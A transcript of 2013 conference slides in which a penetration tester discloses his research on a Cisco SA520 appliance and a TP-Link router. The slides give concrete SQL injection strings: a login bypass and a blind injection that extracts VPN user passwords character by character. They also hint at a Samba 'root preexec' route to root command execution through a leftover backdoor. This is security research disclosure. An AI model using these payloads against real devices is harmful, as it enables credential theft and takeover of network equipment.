Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013...
Transcript of Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013...
![Page 1: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/1.jpg)
Embedded Devices Hacking Confidence 2013
Michał Sajdak, Securitum sekurak.pl
![Page 2: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/2.jpg)
About me
Pentester / trainer
Founder of sekurak.pl
![Page 3: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/3.jpg)
Agenda
Two examples of my research – devices hacking
SA500 – Cisco Security Appliance Unauthenticated remote code exec
Current status: patched
TP-Link routers (other devices?) Unauthenticated remote code exec
Research from this year. Current status: patched?
I will present it live
![Page 4: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/4.jpg)
Warning
All info for educational / legal use only!
![Page 5: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/5.jpg)
First device
Cisco SA 520
![Page 6: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/6.jpg)
First device
Cisco SA 520. Menu:
OS command Exec
SQLi – login screen
Authentication data in plaintext
Let’s see
![Page 7: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/7.jpg)
First device
LAB architecture
![Page 8: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/8.jpg)
SQL injection - example
http://site.pl/news.php?id=10
SELECT * FROM news WHERE id = 10 AND active = 1
http://site.pl/news.php?id=10%20OR%201=1%23
SELECT * FROM news WHERE id = 10 OR 1=1# AND active = 1
8
![Page 9: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/9.jpg)
SQL injection
Let’s go back to SA 500 Appliance
OS Commanding
SQL injection – login page?
9
![Page 10: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/10.jpg)
SQL injection
SA 500 Appliance $SQL = „SELECT * FROM users WHERE login = ‘$login’ AND password = ‘$password’
We control $login and $password
So let’s use $login/password = ‘ or ‘1’=‘1 which gives:
$SQL = „SELECT * FROM users WHERE login = ‘’ or ‘1’=‘1’ AND password = ‘’ or ‘1’=‘1’
10
![Page 11: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/11.jpg)
SQL injection
SA 500 Appliance $SQL = „SELECT * FROM users WHERE login = ‘’ or ‘1’=‘1’ AND password = ‘’ or ‘1’=‘1’
It returns all users from the table
Let’s try this on SA520
We can employ here another technique – blind sql injection exploitation
11
![Page 12: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/12.jpg)
SQL injection
SA 500 Appliance Goal: we want all logins and passwords in plaintext (without logging into the device)
12
![Page 13: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/13.jpg)
SQL injection
Next steps: 1. We need to know DB type (SQL syntax issues)
2. We need to know the table name (and its column names), where user data is stored
Both information can be obtained by whitebox analysis (ie. earlier OS exec vulnerability)
DB type is SQLLite
The table name is SSLVPNUsers
The columns are: Username and Password
13
![Page 14: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/14.jpg)
SQL injection
Full query which can be used to get all users and passwords from the db is:
SELECT Username, Password from SSLVPNUsers
But we can’t use it directly in our case Login screen doesn’t display anything except for error messages
14
![Page 15: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/15.jpg)
SQL injection
We have to get all the login/password letters one by one…
How to do this? We need some SQL practice ;-)
15
![Page 16: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/16.jpg)
SQL injection
SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0
Returns password of the first user in the DB
substr((SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0),1,1)
Returns the 1st letter of the password of the first user in the DB
16
![Page 17: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/17.jpg)
SQL injection
Our login will be: ‘ OR substr((SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0),1,1)=‘a’-- Resulting in the following query: SELECT * FROM SSLVPNUser WHERE login = ‘‘ OR substr((SELECT Password FROM SSLVPNUser LIMIT 1 OFFSET 0),1,1)=‘a’--’ AND password = ‘$password’
Returns „invalid username” when =‘a’ part is not true
Returns all users (other error) where =‘a’ part is true
17
![Page 18: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/18.jpg)
Second device
TP-Link TL-WDR4300
Firmware: 12.2012
Others models also affected
(possibly all?)
http://sekurak.pl/more-information-about-tp-link-backdoor/
![Page 19: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/19.jpg)
Second device
Menu: path traversal chroot bypass configuration overwrite backdoor?
Remote code execution as root Tftp user They say that there is a ‘standard’ WiFi calibration procedure in the factory
But they forgot to remove the dev calibration software :-P
Let’s see
![Page 20: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/20.jpg)
Second device
Samba hint
http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html
root preexec (S)
This is the same as the preexec parameter except that the command is run as root. This is useful for mounting filesystems (such as CDROMs) when a connection is opened.
![Page 21: Embedded Devices Hacking Confidence 2013 - Sekurak · Embedded Devices Hacking Confidence 2013 Michał Sajdak, Securitum ... Founder of sekurak.pl . Agenda Two examples of my research](https://reader036.fdocuments.us/reader036/viewer/2022063008/5fbe377ee45dca19a043c695/html5/thumbnails/21.jpg)
Thanks for attending
Do you like the presentation?
Vulnerabilities in HP network printers
Confirmed by HP – info to be announced soon (when the patch is available)
Contact: [email protected]